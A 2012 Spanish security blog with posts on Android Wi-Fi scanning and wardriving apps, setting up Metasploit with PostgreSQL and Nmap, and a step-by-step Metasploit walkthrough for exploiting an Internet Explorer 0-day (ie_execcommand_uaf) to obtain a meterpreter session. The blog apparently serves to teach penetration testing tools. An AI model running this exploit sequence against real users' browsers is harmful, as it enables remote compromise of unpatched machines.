sábado, 29 de septiembre de 2012

Aplicaciones Android - Wardrive

  En esta entrada se analizará la aplicación Wardrive para Android:


 Esta interesante aplicación está disponible en 2 versiones, una para Android 4 y superiores
Wardrive (Android 4+)
y otra para la versión 2.2 de Android o superior:
Old Wardrive

¿Y qué nos permite realizar esta aplicación? Pues wardriving.

La Wikipedia define este concepto como:
Se llama wardriving a la búsqueda de redes inalámbricas Wi-Fi desde un vehículo en movimiento. Implica usar un coche o camioneta y un ordenador equipado con Wi-Fi, como un portátil o una PDA, para detectar las redes. Esta actividad es parecida al uso de un escáner para radio.
 Gracias a las tecnologías de hoy, ya no es necesario ir cargando por ahi con un portatil, ya que los smartphones disponen de antenas wifi capaces detectar redes inalámbricas.


   El funcionamiento de la aplicación es simple, basta con abrirla, pulsar la opción "Start Scanning" y entonces el dispositivo irá detectando redes conforme las tenga al alcance:


  También es posible cambiar el tipo de mapa, para ello basta en pulsar en "Map Mode":


  Entre sus opciones permite personalizar la información presentada en el mapa (Options -> Map options):


  En este menú se encuentra la opción de mostrar las estadísticas de las redes detectadas, mostrando el numero de redes detectadas, y los respectivos valores en función del cifrado utilizado.

 Además también es posible configurar la forma de detectar redes inálambricas:



  Y por último, existe una interesante posibilidad que permite exportar las redes detectadas en un archivo .kml para poder visualizarlas en Google Earth (no es posible en la versión de Android). Esto es tan simple como desde el menú Archivo escoger Abrir y seleccionar el archivo pertinente (por defecto se llama wardrive.kml):


 al abrirlo se mostraran las redes detectadas:



  Como conclusión, me han sorprendido los resultados de las estadísticas referentes a los puntos de acceso detectados, ya que de 255, aún 66 de ellos poseen cifrado WEP con su escasa seguridad y los riesgos que ello conlleva.

Cierro el post y nos leemos en breve ;)

miércoles, 19 de septiembre de 2012

0-day en IE y Metasploit, al ataque!!

  Hace unos días aparecía una vulnerabilidad (un 0day) que afecta a diferentes versiones de Internet Explorer (IE 7, 8 y 9) y a las diversas versiones del sistema operativo de Microsoft que lo utilizan (Windows XP, Windows Vista y Windows 7). Hoy leyendo mis RSS leo en Flu-Project que Metasploit ya lo tiene implementado, así que vamos a ver como utilizarlo :D

  Lo primero, SIEMPRE, antes de utilizar Metasploit, hay que actualizarlo, para ello:
msfupdate
  una vez este al día lo iniciamos con:
msfconsole 
 y veremos su bonita presentación (son geniales los banners de metasploit xD):


  Lo siguiente es seleccionar el exploit a utilizar, para ello:
use exploit/windows/browser/ie_execcommand_uaf

 Siempre que vamos a ejecutar un exploit o cualquier funcionalidad que ofrece metasploit, es recomendable el comando info que nos mostrara informacion del mismo:
info

 En este caso vemos que el exploit funciona sobre:

  • IE7 en Windows XP SP3
  • IE8 en Windows XP SP3
  • IE7 en Windows Vista
  • IE8 en Windows Vista
  • IE8 en Windows 7
  • IE9 en Windows 7

 Las pruebas las se han realizado sobre un Windows 7 con IE 8, pero teóricamente soporta todas esas versiones y SO.

  El siguiente paso es especificar la IP del servidor donde se preparará el exploit, es decir, nuestra IP, para ello:
set SRVHOST <IP>
en el ejemplo:
set SRVHOST 192.168.0.111
y por último lanzar el exploit:
exploit 

  Con esto el servidor se quedará en espera de conexiones, entonces, cuando la víctima acceda a la dirección que nos mostrará Metasploit (campo Using URL), se lanzará el exploit :D



 
  Al final de todo el proceso, sino ha habido ningún problema, tendremos una sesión de meterpreter:
sessions -l


  Listo, ya está todo el proceso, y al ser una vulnerabilidad 0day todavía no está corregida aumentando su peligrosidad.

  Si queréis más información, aquí tenéis una entrada del blog de rapid7 => https://community.rapid7.com/community/metasploit/blog/2012/09/17/lets-start-the-week-with-a-new-internet-explorer-0-day-in-metasploit


Nos leemos en breve ;)

viernes, 14 de septiembre de 2012

Nmap y Metasploit - Parte 2

  En la anterior entrada se preparó el entorno con PostgreSql configurado y Metasploit generando una base de datos con dicha tecnología.

  A continuación se mostraran dos tipos de interacción entre Metasploit y Nmap, la primera ejecutandolos de forma independiente y la segunda lanzando Nmap desde la shell de msfconsole.


Ambos independientes

  Para que metasploit importe el trabajo realizado por Nmap es necesario que éste utilice el flag -oX seguido del nombre con que se guardará el archivo generado, veamos un ejemplo:
nmap -A -oX 192.168.0.1/24
cuando acabe la ejecución y se genera un archivo (llamado datos en el ejemplo) en el directorio actual.


En el siguiente paso Metasploit importará el archivo generado, para ello se basará en la opción db_import:
db_import datos



Nmap "dentro" de Metasploit

  Partimos de una situación nueva, es decir, se acaba de crear la base de datos con db_conect como en el post anterior, y ahora se va a realizar una búsqueda con Nmap e insertar los datos en  la BD.

  Para realizar esta tarea basta con utilizar desde dentro de msfconsole la opción db_nmap en lugar de nmap. Los flags de la segunda son iguales para db_nmap.


 de esta forma los datos obtenidos son insertados automáticamente en la base de datos previamente seleccionada.


Accediendo a la BD

  Para moverse por la base de datos y los datos obtenidos existen varios comandos como son hosts o services entre otros.

  [+] El comando hosts muestra todos los dispositivos que han sido añadidos a la base de datos e información básica sobre estos en función del análisis realizado con Nmap.
hosts

  dicho comando también, mediante el flag -c, permite filtrar por columnas como es el caso del ejemplo:
hosts -c address,os_name


  [+] Otro comando interesante es services, que muestra una lista de todos los servicios e información de los dispositivos que los ejecutan.
services

  Comentar, que este comando al igual que hosts, admite el uso del flag -c.

=> Referencia DB de Metasploit: https://www.offensive-security.com/metasploit-unleashed/Using_The_Database

Con esto concluye este post, nos leemos en breve ;)

Aetsu

miércoles, 12 de septiembre de 2012

Nmap y Metasploit - Parte 1


  Nueva entrada relacionada con Metasploit y Nmap en la que se verá como interactuan ambas herramientas, permitiendo que una base de datos gestione los análisis realizados por el conocido escaner de redes y puertos. Este contenido será presentado en dos partes, la primera relacionada con la preparación del entorno y la segunda relacionada con la interacción.

  Como aclaración comentar que el sistema operativo será Backtrack 5 R3 como en otras ocasiones ;).




Preparar PostgreSQL


  Lo primero que hay que hacer es instalar PostgreSQL ya que es el SGDB que utiliza Metasploit.

apt-get install postgresql libpq-dev
 A continuación es necesario configurar de forma básica PostgreSQL para trabajar con él.

   [+] Primero hay que cambiar la contraseña del usuario postgres, para ello:
passwd postgres
   [+] El siguiente paso es acceder a la shell de PostgreSQL y cambiar la constraseña del usuario por defecto (postgres):
su postgres -c psqlALTER USER postgres WITH PASSWORD 'nueva_Contraseña';

  donde hay que sustituir <nueva_Contraseña> por el nuevo password, en el caso de la imagen de ejemplo es 'serenity'.


  Con estos simples pasos ya está PostgreSQL listo para trabajar.




Conectar Metasploit con la Base de Datos

  Una vez iniciado Metasploit (msfconsole), se utilizará la opción db_connect:
db_connect postgres:"serenity"@127.0.0.1/datosNmap

 Cuya la sintaxis es la siguiente:
db_connect <usuario>:"<contraseña>"@<ip_servidor>/<nombre_BD>
 Respecto al campo nombre_BD, si no se escoge una base de datos existente, Metasploit la generará para la ocasión.

  Por último la opción db_status permite comprobar si se está conectado a la base de datos:
db_status



  Con esto concluye la primera entrada relacionada con las herramientas antes comentadas, en la siguiente se importarán datos generados por Nmap y se mostrara como ejecutarlo dentro de Metasploit.


-> Referencias PostgreSql => http://www.guia-ubuntu.org/index.php?title=PostgreSQL


Nos leemos en breve ;)

sábado, 8 de septiembre de 2012

Aplicaciones Android - Free World

  Tercera entrega relacionada con aplicaciones de Android, en esta ocasión Free World.
 

  Esta app es gratuita y permite tener un acceso rápido desde el móvil a una interesante colección de blogs y sitios relacionados con el software libre.


  Una vez se accede a la sección de "Explorar webs" se presentan seis categorías para clasificar los distintos tipos de noticias que encontraremos. Éstas son general, Android, Debian, Fedora, KDE y Ubuntu.

  Cuando tengamos la categoria escogida, solo nos queda escoger el blog deseado ...


  y disfrutar ;)



  Antes de despedirme comentar que si queréis que vuestro sitio aparezca en la aplicación, podéis encontrar en el menú principal una opción para solicitarlo ;)

  Un saludo, nos leemos en breve.

Aetsu

sábado, 1 de septiembre de 2012

Aplicaciones Android - Wifi Analyzer

   Siguiendo con estos pequeños análisis de aplicaciones de Android ahora le toca a Wifi Analyzer:




   Esta aplicación nos permite buscar redes a nuestro alrededor y obtener información de estas. Dicha información va desde el nombre de la red, el tipo de cifrado, la intensidad de señal o su BSSID:




   Además también permite obtener gráficas en función de la intensidad de las diversas señales:




   Y por último nos recomienda en que canal debemos poner nuestro AP para evitar interferencias con otros:



   Con esto cierro este breve post, en próximas entradas otras aplicaciones de Android :D